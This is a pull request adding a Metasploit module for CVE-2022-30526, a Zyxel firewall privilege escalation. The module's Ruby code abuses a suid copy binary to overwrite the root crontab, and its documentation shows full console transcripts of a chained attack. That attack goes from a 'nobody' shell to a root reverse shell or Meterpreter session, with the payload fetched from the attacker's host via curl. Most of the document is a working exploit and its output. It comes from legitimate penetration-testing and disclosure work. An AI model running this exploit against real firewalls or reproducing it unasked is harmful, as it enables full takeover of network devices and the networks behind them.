### PR TITLE
Zyxel Firewall LPE (CVE-2022-30526)

### DIFF
--- a/documentation/modules/exploit/linux/local/zyxel_suid_cp_lpe.md
+++ b/documentation/modules/exploit/linux/local/zyxel_suid_cp_lpe.md
@@ -1,0 +1,198 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits CVE-2022-30526, a local privilege escalation vulnerability that
+allows a low privileged user (e.g. `nobody`) escalate to root. The issue stems from
+a suid binary that allows all users to copy files as `root`. This module overwrites
+the firewall's crontab to execute an attacker provided script, resulting in code
+execution as `root`.
+
+In order to use this module, the attacker must first establish shell access. For
+example, by exploiting CVE-2022-30525.
+
+Known affected Zyxel models are:
+
+* USG FLEX 50, 50W, 100W, 200, 500, 700
+* ATP 100, 200, 500, 700, 800
+* VPN 50, 100, 300, 1000
+* USG20-VPN and USG20W-VPN
+
+### Setup
+
+The vulnerable system is a hardware firewall/vpn that, to our knowledge,
+cannot be emulated. As such, testing requires a physical device. Once the
+device has been acquired, you'll need to accomplish the following:
+
+* Once powered on, register the device with Zyxel. You cannot do anything
+with the device until this is accomplished. Fortunately, the web interface
+will force you to complete this process. You'll need to create an account at
+https://portal.myzyxel.com and the firewall will need internet connectivity
+to complete the process.
+
+* Once the device is up to date, you'll need to downgrade the firmware. From
+portal.myzyxel.com you can download old firmware from:
+
+Devices Management -> Firmware Download
+
+From there you can select model and version to download. The last vulnerable
+version from the affected systems is 5.21 Patch 1.
+
+* Once you are using the vulnerable version, there is no special configuration
+you need to exploit from the LAN. If you want to exploit from the WAN, you'll
+need to enable "HTTP" and/or "HTTPS" through the firewall. From the web interface
+do:
+
+Configuration -> Objects -> Service -> Service Group -> Default_Allow_WAN_To_ZyWALL
+
+And move "HTTP" and/or "HTTPS" from the left column to the right. After applying
+the firewall should pass HTTP/HTTPS through the firewall to the web interface.
+
+* That's it. You are good to go.
+
+## Verification Steps
+
+* Follow setup steps above.
+* Establish a shell on the device. See `exploit/linux/http/zyxel_ztp_rce`
+* Do: `use exploit/linux/local/zyxel_suid_cp_lpe`
+* Do: `check`
+* Verify the remote host is exploitable
+* Do: `set LHOST <ip>`
+* Do: `run`
+* Verify the module acquires a root shell
+
+## Options
+
+## Scenarios
+
+### Successful escalation to root bash shell on USG Flex 100 using firmware 5.21
+
+```
+msf6 > use exploit/linux/http/zyxel_ztp_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
+RHOST => 10.0.0.14
+msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/http/zyxel_ztp_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Sending command to /ztp/cgi-bin/handler
+[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.14:50827) at 2022-05-13 11:55:47 -0700
+[+] Command successfully executed.
+
+id
+uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
+cat /zyinit/fwversion
+KERNEL_VERSION=3.10.87
+FIRMWARE_VER=5.21(ABUH.1)521-r103462-k3
+CAPWAP_VER=1.00.04
+COMPATIBLE_PRODUCT_MODEL_0=E15D
+COMPATIBLE_PRODUCT_MODEL_1=FFFF
+COMPATIBLE_PRODUCT_MODEL_2=FFFF
+COMPATIBLE_PRODUCT_MODEL_3=FFFF
+COMPATIBLE_PRODUCT_MODEL_4=FFFF
+MODEL_ID=USG FLEX 100
+KERNEL_BUILD_DATE=2022-03-15 03:18:23
+BUILD_DATE=2022-03-15 05:14:23
+FSH_VER=1.0.0
+^Z
+Background session 1? [y/N]  y
+msf6 exploit(linux/http/zyxel_ztp_rce) > use exploit/linux/local/zyxel_suid_cp_lpe
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set session 1
+session => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. System version: USG FLEX 100, 5.21(ABUH.1)521-r103462-k3
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Overwriting /var/zyxel/crontab
+[*] The payload may take up to 60 seconds to be executed by cron
+[+] Deleted /tmp/bJUQqm
+[*] Resetting crontab to the original version
+[+] Deleted /tmp/IcNlzvnv5
+[*] Command shell session 2 opened (10.0.0.28:4444 -> 10.0.0.14:50829) at 2022-05-13 11:57:08 -0700
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
+```
+
+### Successful escalation to root Meterpreter on USG Flex 100 using firmware 5.21
+
+```
+msf6 > use exploit/linux/http/zyxel_ztp_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
+RHOST => 10.0.0.14
+msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/http/zyxel_ztp_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Sending command to /ztp/cgi-bin/handler
+[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.14:50827) at 2022-05-13 11:55:47 -0700
+[+] Command successfully executed.
+
+id
+uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
+cat /zyinit/fwversion
+KERNEL_VERSION=3.10.87
+FIRMWARE_VER=5.21(ABUH.1)521-r103462-k3
+CAPWAP_VER=1.00.04
+COMPATIBLE_PRODUCT_MODEL_0=E15D
+COMPATIBLE_PRODUCT_MODEL_1=FFFF
+COMPATIBLE_PRODUCT_MODEL_2=FFFF
+COMPATIBLE_PRODUCT_MODEL_3=FFFF
+COMPATIBLE_PRODUCT_MODEL_4=FFFF
+MODEL_ID=USG FLEX 100
+KERNEL_BUILD_DATE=2022-03-15 03:18:23
+BUILD_DATE=2022-03-15 05:14:23
+FSH_VER=1.0.0
+^Z
+Background session 1? [y/N]  y
+msf6 exploit(linux/http/zyxel_ztp_rce) > use exploit/linux/local/zyxel_suid_cp_lpe
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set session 1
+session => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set target 1
+target => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. System version: USG FLEX 100, 5.21(ABUH.1)521-r103462-k3
+[*] Executing Linux Dropper for linux/mips64/meterpreter_reverse_tcp
+[*] Using URL: http://10.0.0.28:8080/0g5aPNZ8DvT1n
+[*] Overwriting /var/zyxel/crontab
+[*] The payload may take up to 60 seconds to be executed by cron
+[*] Client 10.0.0.14 (curl/7.70.0) requested /0g5aPNZ8DvT1n
+[*] Sending payload to 10.0.0.14 (curl/7.70.0)
+[+] Deleted /tmp/hdpBYBRk
+[+] Deleted /tmp/OpTYd0c0
+[*] Meterpreter session 3 opened (10.0.0.28:4444 -> 10.0.0.14:50832) at 2022-05-13 12:00:01 -0700
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Resetting crontab to the original version
+[*] Server stopped.
+
+meterpreter > shell
+Process 29664 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
+```

--- a/modules/exploits/linux/local/zyxel_suid_cp_lpe.rb
+++ b/modules/exploits/linux/local/zyxel_suid_cp_lpe.rb
@@ -1,0 +1,164 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::File
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zyxel Firewall SUID Binary Privilege Escalation',
+        'Description' => %q{
+          This module exploits CVE-2022-30526, a local privilege escalation vulnerability that
+          allows a low privileged user (e.g. nobody) escalate to root. The issue stems from
+          a suid binary that allows all users to copy files as root. This module overwrites
+          the firewall's crontab to execute an attacker provided script, resulting in code
+          execution as root.
+
+          In order to use this module, the attacker must first establish shell access. For
+          example, by exploiting CVE-2022-30525.
+
+          Known affected Zyxel models are: USG FLEX (50, 50W, 100W, 200, 500, 700),
+          ATP (100, 200, 500, 700, 800), VPN (50, 100, 300, 1000), USG20-VPN and USG20W-VPN.
+        },
+        'References' => [
+          ['CVE', '2022-30526'],
+          ['URL', 'https://www.zyxel.com/support/Zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml']
+        ],
+        'Author' => [
+          'jbaines-r7' # discovery and metasploit module
+        ],
+        'DisclosureDate' => '2022-06-14',
+        'License' => MSF_LICENSE,
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD, ARCH_MIPS64],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPS64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'wget' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'MeterpreterTryToFork' => true,
+          'WfsDelay' => 70
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  # The check first establishes the system is a Zyxel firewall by parsing the
+  # /zyinit/fwversion file. Then it attempts to prove that zysudo.suid can be
+  # used by the user to write to otherwise unwrittable location.
+  def check
+    fwversion_data = read_file('/zyinit/fwversion')
+    if fwversion_data.nil? || fwversion_data.empty?
+      return CheckCode::Safe('Could not read /zyinit/fwversion. The target is not a Zyxel firewall.')
+    end
+
+    model_id = fwversion_data[/MODEL_ID=(?<model_id>[^\n]+)/, :model_id]
+    return CheckCode::Unknown('Failed to identify the firewall model.') if model_id.nil? || model_id.empty?
+
+    firmware_ver = fwversion_data[/FIRMWARE_VER=(?<firmware_ver>[^\n]+)/, :firmware_ver]
+    return CheckCode::Unknown('Failed to identify the firmware version.') if firmware_ver.nil? || firmware_ver.empty?
+
+    test_file = "/var/zyxel/#{rand_text_alphanumeric(12..16)}"
+    unless cmd_exec("/bin/cp /etc/passwd #{test_file}") == "/bin/cp: cannot create regular file '#{test_file}': Permission denied"
+      return CheckCode::Unknown("Failed to generate a permission issue. System version: #{model_id}, #{firmware_ver}")
+    end
+
+    suid_copy_result = cmd_exec("zysudo.suid /bin/cp /etc/passwd #{test_file}")
+    unless suid_copy_result.empty?
+      return CheckCode::Safe("zysudo.suid copy failed. System version: #{model_id}, #{firmware_ver}")
+    end
+
+    # clean up the created file
+    cmd_exec("zysudo.suid /bin/rm #{test_file}")
+
+    return CheckCode::Vulnerable("System version: #{model_id}, #{firmware_ver}")
+  end
+
+  # no matter what happens, try to reset the crontab to the original state and
+  # delete the backup file.
+  def cleanup
+    unless @crontab_backup.nil?
+      print_status('Resetting crontab to the original version')
+      cmd_exec("zysudo.suid /bin/cp #{@crontab_backup} /var/zyxel/crontab")
+      rm_rf(@crontab_backup)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    # this file will contain the payload and get executed by cron
+    exec_filename = "/tmp/#{rand_text_alphanumeric(6..12)}"
+    register_file_for_cleanup(exec_filename)
+    cmd_exec("echo -e \"#!/bin/bash\\n\\n#{cmd}\" > #{exec_filename}")
+    cmd_exec("chmod +x #{exec_filename}")
+
+    # this file will be a copy of the original crontab, plus our additional malicious entry
+    evil_crontab = "/tmp/#{rand_text_alphanumeric(6..12)}"
+    register_file_for_cleanup(evil_crontab)
+    copy_file('/var/zyxel/crontab', evil_crontab)
+    cmd_exec("echo '* * * * * root #{exec_filename} &' >> #{evil_crontab}")
+
+    # this is the backup copy of the original crontab. It'll be restored on new session
+    @crontab_backup = "/tmp/#{rand_text_alphanumeric(6..12)}"
+    copy_file('/var/zyxel/crontab', @crontab_backup)
+
+    # overwrite the legitimate crontab. this is how we get exectuion.
+    print_status('Overwriting /var/zyxel/crontab')
+    cmd_exec("zysudo.suid /bin/cp #{evil_crontab} /var/zyxel/crontab")
+
+    # check if the session has been created. Give it 70 seconds to come in.
+    # The extra 10 seconds is to account for high latency links.
+    print_status('The payload may take up to 60 seconds to be executed by cron')
+    sleep_count = 70
+    until session_created? || sleep_count == 0
+      sleep(1)
+      sleep_count -= 1
+    end
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+end


### PR DESCRIPTION
This module exploits [CVE-2022-30526](https://www.zyxel.com/support/Zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml), a local privilege escalation vulnerability that allows a low privileged user (e.g. `nobody`) escalate to root. The issue stems from a suid binary that allows all users to copy files as `root`. This module overwrites the firewall's crontab to execute an attacker provided script, resulting in code execution as `root`.

In order to use this module, the attacker must first establish shell access on an affected firewall. For example, by exploiting [CVE-2022-30525](https://github.com/rapid7/metasploit-framework/blob/133b9e307a0ccbf1841fc05ab43d3c1aef9e3e82/documentation/modules/exploit/linux/http/zyxel_ztp_rce.md).

Known affected Zyxel models are:

* USG FLEX 50, 50W, 100W, 200, 500, 700
* ATP 100, 200, 500, 700, 800
* VPN 50, 100, 300, 1000
* USG20-VPN and USG20W-VPN

## Verification

List the steps needed to make sure this thing works

- [ ] Acquire a shell on an affected device (see: CVE-2022-30535 / zyxel_ztp_rce.rb)
- [ ] `use exploit/linux/local/zyxel_suid_cp_lpe`
- [ ] `check`
- [ ] **Verify** the remote host is exploitable
- [ ] `set LHOST <ip>`
- [ ] `run`
- [ ] **Verify** the a root session is created

## Video || GTFO

https://www.youtube.com/watch?v=PtHzdQ_slZg

## PCAP || GTFO

[zyxel_priv_esc.zip](https://github.com/rapid7/metasploit-framework/files/9140163/zyxel_priv_esc.zip)
